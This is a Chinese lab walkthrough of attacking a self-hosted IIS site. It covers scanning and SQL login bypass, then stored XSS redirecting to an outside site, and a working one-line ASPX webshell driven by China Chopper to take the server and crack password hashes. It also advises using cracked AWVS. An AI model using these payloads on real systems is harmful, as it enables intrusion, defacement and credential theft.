流程演练目录
准备阶段
首先关闭电脑的所有防火墙等防护措施。
在Windows上部署一个IIS web 服务
在控制面版中找到程序,然后点击启用或关闭windows服务,打开之后将如下几项全部勾上
在计算机管理中启动NSP.NET服务
如果计算机中.net环境安装不全,可在cmd中输入
"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable
之后在服务和应用程序下找到Internet信息服务,点进去之后,右击新建网站,然后在应用程序池中就可以看到我们新建的网站,右击将.net Framwork版本改为4.0。
然后在高级设置中,如使用64位的windows系统需要应用程序池设置32位应用程序为true
建立完成的网站主页如下:
网络探查与端口扫描
局域网探查工具Lansee
打开Lansee.exe,在设置中输入要探查的IP地址段
端口扫描工具AdvancedPortScanner
打开AdvancedPortScanner软件,在主界面中选择Use range选项,填入准备扫描的网段或主机IP。
选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。
设置完成后点击ok回到主界面,单机Scan按钮,经过一段时间的等待,将显示扫描结果。
web扫描
网站后台扫描工具御剑
在我们之前搭建好的靶站中,
打开御剑后台扫描工具,输入要扫描的网站域名。线程选择2-4个,点击开始扫描。结果如下:
网络漏洞扫描工具AWVS
安装AWVS并破解
在URL中输入自己的IP地址,利用target finder功能扫描自己的IP地址
利用web scanner功能扫描自己搭建的网站
利用site crawler功能爬取网站的文件和目录
漏洞利用
网站后台绕过
猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。(猜测后台登录页面为admin)
尝试使用弱密码登录系统(猜测用户名为admin,密码为admin)
输入一些特殊字符,如‘’/+-=等,点击登录,观察系统反馈。
根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。(在登录页面输入' or 1 or ')
进入网站后台管理界面。
篡改页面内容
在网站前台或后台中寻找能够提交信息的合适位置。(找到留言板)
在留言板中提交代码<script>alert("test")</script>,出现弹窗。
提交代码:
<script>window.location.href="http://d.mytanwan.com/h/26026.html"</script>
出现如下内容,留言网页被篡改
上传木马
一句话木马的使用
新建文本文档,输入如下内容,并修改后缀为.aspx
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>进入后台管理页面,点击友情链接管理,点击添加,然后在选择文件中加入我们刚刚建的.aspx文件,点击提交
然后将鼠标放在我们提交的文件上,点击右键,复制地址。打开利用中国菜刀工具,点击添加,输入我们复制的地址,连接一句话木马,密码为pass
获得目标服务器的操作权限并拿到数据库文件。
对数据库中的账号密码进行解密。(在百度上搜索md5进行解密)
7662
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
